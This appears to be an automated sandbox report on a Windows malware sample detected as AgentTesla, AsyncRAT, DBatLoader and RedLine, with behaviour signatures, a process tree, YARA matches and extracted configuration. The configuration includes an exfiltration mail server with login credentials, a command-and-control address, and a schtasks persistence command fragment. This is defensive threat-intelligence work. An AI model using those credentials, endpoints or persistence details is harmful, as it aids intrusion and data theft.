Edit tour

Windows Analysis Report
PCMNil7wkU.exe

Overview

General Information

Sample name:	PCMNil7wkU.exe renamed because original name is a hash value
Original sample name:	344c9c0f72c535e334a4b605212c69d9.exe
Analysis ID:	1379527
MD5:	344c9c0f72c535e334a4b605212c69d9
SHA1:	952e1b506659a4113b2eb0857dbb86ee08e043a5
SHA256:	5664820279aa20d408c82998bff07ab34c0986124b09e9ef2025c73686c77f4f
Tags:	exeHUNModiLoader
Infos:

Detection

AgentTesla, AsyncRAT, DBatLoader, RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected AgentTesla

Yara detected AsyncRAT

Yara detected DBatLoader

Yara detected RedLine Stealer

.NET source code contains method to dynamically call methods (often used by packers)

Allocates memory in foreign processes

Contains functionality to log keystrokes (.Net Source)

Drops PE files with a suspicious file extension

Machine Learning detection for dropped file

Sample is not signed and drops a device driver

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Writes to foreign memory regions

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to check if a connection to the internet is available

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query locales information (e.g. system language)

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

PCMNil7wkU.exe (PID: 4332 cmdline: C:\Users\user\Desktop\PCMNil7wkU.exe MD5: 344C9C0F72C535E334A4B605212C69D9)

cmd.exe (PID: 2940 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\AkaelkovO.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

vokleakA.pif (PID: 3716 cmdline: C:\Users\Public\Libraries\vokleakA.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

Akaelkov.PIF (PID: 2504 cmdline: "C:\Users\Public\Libraries\Akaelkov.PIF" MD5: 344C9C0F72C535E334A4B605212C69D9)

vokleakA.pif (PID: 6096 cmdline: C:\Users\Public\Libraries\vokleakA.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

Akaelkov.PIF (PID: 5616 cmdline: "C:\Users\Public\Libraries\Akaelkov.PIF" MD5: 344C9C0F72C535E334A4B605212C69D9)

vokleakA.pif (PID: 2072 cmdline: C:\Users\Public\Libraries\vokleakA.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://asec.ahnlab.com/ko/29133/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/ https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://malcat.fr/blog/exploit-steganography-and-delphi-unpacking-dbatloader/ https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader https://news.sophos.com/en-us/2020/09/24/email-delivered-modi-rat-attack-pastes-powershell-commands	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/ https://bartblaze.blogspot.com/2021/06/digital-artists-targeted-in-redline.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.oripam.xyz", "Username": "101@oripam.xyz", "Password": "231Father@"}

Threatname: AsyncRAT

{"Ports": ["2017"], "Server": ["139.84.229.159"], "Mutex": "jhT6lZT93vW5", "Certificate": "MIIE8jCCAtqgAwIBAgIQAN/vhz0nNn3o7T4qYMdf5TANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjQwMTIwMDc0NTQxWhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAKPPaC+bexLNgYSa0NaH9Mas6Ou1FeJxZDQs1XPqMlqBb4BLKoRgzV3Z82q8tEvHr6A/Csxa280BBC5nf2ja3uOH8VUPNfp3lOyZC1QRuYCBQxPqGpXUr6nel/tUWCAwfWSqurDw2DdMu/5Ndp85oMxZm0G1KbrJG7gVrTbq0Y3zkQew6yObf5c50xLj73NYa5ku7IS19xTHC4XM63vQiDH8cJ0DzDIt0J05qHOBUkX2xIMndVbx+fOEMsxJybe8xR12vw2MHuZliUjeBNBJN9GCvMjBgNz9mjZNj9BUgTlKO9siur+46Ouy4GhvJxqenLpSN9geEmbSzHJnNkjyPbsjj+4h0PAxtifWYlkcZlWAKu0zkq1lqZ1rMB6ojlu3VOC/6JLi5eiFei2g6IGXniGEGe0ZczXhwtxJ5TSp0EECaMiPXI6IJdOh4AyAk04CkzMxUEWbN4/nxgpCzjKhf3XiU0GA4jVKMsCmxCaInTbxJMb90NumMmBAeW+ProvQSQPK1EC1CwJ8CS6yAsG30LOCp2dYWFfiBfH1sKOtUQECaHRje3W0Bp8QP6WUuoAEs2WxY4adHP8gayXXy97fjm+UikzsghlRmmGff6Osu5bWAsuipS3JxDdW9b0to1BeYB3QDGl3b/ay2MNEMNYcX36LF8rHxTRrvJoXzLEOyUNdAgMBAAGjMjAwMB0GA1UdDgQWBBQaTinJBsSVCYrN1fxnyZFNbQGpDTAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQCGloMi9BEkVs4W9D/6Ma2u+1ThujGbyOCbcsWJOsnZfefykICVbdmQVBzaF8LKAAVXRs2kQvkmYA63llhWXcos3meeJFLsVFHN3x7n8Ec61ukHN6WzctLldLsw9RIlckqHvKLLEaCQtFFb1c4fVDa7Ux8YSS89hxb5iYUFSphdMyc2UCRyQE61+Wu+oaFxFKZ7JQdAQ9Kqz5NAfbeL+CqBr1HXdMtGINjVzlG/BfIkYsGWfJ8tk9Y4IOVuEOY1QoY7WpSF3Avk0joZgcAxy+FwBW4B1ID/B2iLGis5dyG5xEfhMam+0Ix+4Q3br93dqt7t/4s5Ox7g5jwyX7RyjzctvFkzaUQ4Y0ZNy/H1x+GoJfU+YTkx6mVofXOTGvmgPX7dVfhS9TnaMjJc+HdXjtuVxhn+cs/Zawyt8Aa7tNkNAA72peOiEvLeWhyQ8Mwv8LMSngC/9w55VezQ9N+MymQ35FC+He4/GPJPCLaC/ga4UG55Fs+kWOzTHxlqzyg72p9XB3IvOHKRPpYn1GH/VYILAOM4uesDkhCpvA2GgCgU9ij/y0/iLKw4LKoSA8GfoiHYn2H1xOJmrWdksJ+YbhAv1jMNpkaUaM8Bpz1ZsOc9dLjd4ts6XFQWBmyRS8Y3gGt/g8Wd+9CzkA6ux/H5jKN4p1el/StAuo2HdbHB07hbsg==", "Server Signature": "XUTz466BGLmG3TcX/C8jLjM1YgeZtXHkWl5foU/hXe7DRq1mTfSGh9lFLUrju0GdFDv9ryfbNyDz7IrKjDX7ScKOSitrpHbj9cFexQC5zpemX62SxcgOCfQTEXAv4IjoEtCjto+taoDkmbmFUivmpW91DUQm06Wnsdzy4luVJT4QCtxSlhL6sVo0Ch0Z0lz+RBUOn7ibniGGu8rKfkE8V/0dlpwM2ZObh5F0n3n+nZ8Q/nVrmGtMs7DoSYe2Co2X4Co4vfZZE4AjUOZYxZI8rFhuSTX213lrUigfM9uWMzcQoD8KRUruTLZJxw/9DLapRe28CSM1RFUOvLk6fsOTVbfoC2Ucb+5uHfuXBIMO9smcWvxw0aG2Qda8Ev/nPx9FCdctcdYZQtamjTBQU2YYIicPPZGtClXcVgL9WLqWNqmKN3shlf8VXfjajEdF3F6QYZp4HIi20jQVsDNXHfvNwPD7Z25d1jBTF39h3UlbX2Mgorb+Eoxrlpq1jokANTzr3BugvCvrjicUSru5nMRUGorVDNkcHE+SOQR/se51eCw+6ebD6MzqzSPjHqc5x4ci5hKwRsw8LjUZyGJxrNybkZ+PgHwsSIo/md1+YeVjsSc8y527gn4wRJ1t+2Crnr0bPth03HwMCa1KMRFRT6eWaqy6e3h2PXRGQ+K2ASFuUWU="}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xcbb29:$x1: AsyncRAT 0xcbb67:$x1: AsyncRAT

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 E6 88 44 24 2B 88 44 24 2F B0 CA 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000007.00000001.2149766444.0000000000400000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000007.00000001.2149766444.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 E6 88 44 24 2B 88 44 24 2F B0 CA 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x4764f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x56038:$a2: Stub.exe 0x560c8:$a2: Stub.exe 0x3e8cc:$a3: get_ActivatePong 0x47867:$a4: vmware 0x476df:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3e7f1:$a6: get_SslClient
00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x476e1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x482c0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x48332:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x483bc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4844e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x484b8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x4852a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x485c0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x48650:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
00000009.00000002.2300614392.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000009.00000002.2300614392.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 E6 88 44 24 2B 88 44 24 2F B0 CA 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000004.00000002.3232986846.000000003206C000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x299af:$x1: AsyncRAT 0x299ed:$x1: AsyncRAT
00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x4808f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x56a78:$a2: Stub.exe 0x56b08:$a2: Stub.exe 0x3f30c:$a3: get_ActivatePong 0x482a7:$a4: vmware 0x4811f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3f231:$a6: get_SslClient
00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x48121:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000009.00000002.2300614392.00000000004A0000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000007.00000002.2218197846.0000000024381000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xaa3:$x1: AsyncRAT 0xae1:$x1: AsyncRAT
00000004.00000002.3207967153.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000004.00000002.3207967153.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 E6 88 44 24 2B 88 44 24 2F B0 CA 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x89515:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x97efe:$a2: Stub.exe 0x97f8e:$a2: Stub.exe 0x80792:$a3: get_ActivatePong 0x8972d:$a4: vmware 0x895a5:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x806b7:$a6: get_SslClient
00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x895a7:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x48aa7:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x9fbdf:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x57490:$a2: Stub.exe 0x57520:$a2: Stub.exe 0xae5c8:$a2: Stub.exe 0xae658:$a2: Stub.exe 0x3fd24:$a3: get_ActivatePong 0x96e5c:$a3: get_ActivatePong 0x48cbf:$a4: vmware 0x9fdf7:$a4: vmware 0x48b37:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x9fc6f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3fc49:$a6: get_SslClient 0x96d81:$a6: get_SslClient
00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x48b39:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x9fc71:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x48537:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x56f20:$a2: Stub.exe 0x56fb0:$a2: Stub.exe 0x3f7b4:$a3: get_ActivatePong 0x4874f:$a4: vmware 0x485c7:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3f6d9:$a6: get_SslClient
00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x485c9:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x491a8:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x4921a:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x492a4:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x49336:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x493a0:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x49412:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x494a8:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x49538:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x89515:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x97efe:$a2: Stub.exe 0x97f8e:$a2: Stub.exe 0x80792:$a3: get_ActivatePong 0x8972d:$a4: vmware 0x895a5:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x806b7:$a6: get_SslClient
00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x895a7:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x89515:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x97efe:$a2: Stub.exe 0x97f8e:$a2: Stub.exe 0x80792:$a3: get_ActivatePong 0x8972d:$a4: vmware 0x895a5:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x806b7:$a6: get_SslClient
00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x895a7:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000009.00000002.2300614392.0000000000450000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000007.00000001.2149766444.0000000000450000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000009.00000001.2234454714.0000000000400000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
